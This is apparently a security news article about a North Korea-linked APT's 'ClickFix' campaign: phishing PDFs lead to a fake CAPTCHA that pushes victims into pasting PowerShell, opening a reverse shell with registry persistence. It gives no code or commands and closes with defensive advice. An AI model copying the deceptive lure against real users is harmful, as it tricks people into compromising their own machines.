Velvet Chollima APTHackers Target Government Officials Using Weaponized PDFs

The DPRK-linked Velvet Chollima Advanced Persistent Threat (APT) group has launched a sophisticated cyberattack campaign targeting South Korean government officials, as well as NGOs, government agencies, and media organizations across North America, South America, Europe, and East Asia.

Initiated in January 2025, this attack, detailed by Microsoft’s Threat Intelligence team and reported by Bleeping Computer, leverages spear-phishing emails with weaponized PDF attachments to deceive victims into executing malicious code.

The campaign introduces a novel social engineering tactic known as “ClickFix,” designed to trick users into running PowerShell commands as administrators, ultimately granting attackers remote access to compromised systems.

Sophisticated Spear-Phishing Campaign

The attack begins with a meticulously crafted spear-phishing email, often masquerading as correspondence from South Korean government officials to build trust with targets over time.

Embedded within the email is a PDF attachment containing a hidden hyperlink that redirects victims to a fraudulent CAPTCHA verification page.

This deceptive interface mimics legitimate security checks, prompting users to confirm they are “not a robot.”

However, upon interaction, a JavaScript function triggers a popup with instructions to execute a series of PowerShell commands, which are conveniently copied to the victim’s clipboard for ease of use.

A Deceptive Attack Chain

Unbeknownst to the user, following these instructions establishes a reverse shell connection to the attacker’s command and control (C2) server, allowing remote execution of commands on the infected machine.

To ensure persistence, the malicious script embeds itself into the Windows registry via the Run Key, guaranteeing reactivation upon every system reboot.

According to the Report, this multi-stage attack chain exemplifies the cunning social engineering tactics employed by Velvet Chollima, exploiting human psychology to bypass traditional security defenses.

The culmination of this attack is the deployment of a reverse shell through a PowerShell script, often named payload.ps1, which creates a TCP connection to the attacker’s C2 server.

This connection enables Velvet Chollima operatives to exfiltrate sensitive data, install additional malware, and potentially propagate through corporate networks if the victim operates within such an environment.

The persistence mechanism, achieved through registry modifications, underscores the long-term threat posed by this campaign, as systems remain compromised even after restarts.

Microsoft’s Threat Intelligence team has highlighted the group’s use of deceptive error messages and fake device registration prompts, further amplifying the campaign’s effectiveness.

The broader implications are alarming, as the targeting of high-profile entities across multiple continents suggests a coordinated effort to gather intelligence or disrupt critical operations.

Organizations are urged to enhance email filtering, educate personnel on recognizing phishing attempts, and enforce strict policies against executing unsolicited commands.

As Velvet Chollima continues to refine its tactics with innovations like ClickFix, the cybersecurity community faces an escalating challenge to counter these persistent and evolving threats.

Vigilance and proactive defense strategies remain paramount in safeguarding against such insidious attacks that exploit both technological and human vulnerabilities.

Find this News Interesting! Follow us on Google News, LinkedIn, & X to Get Instant Updates!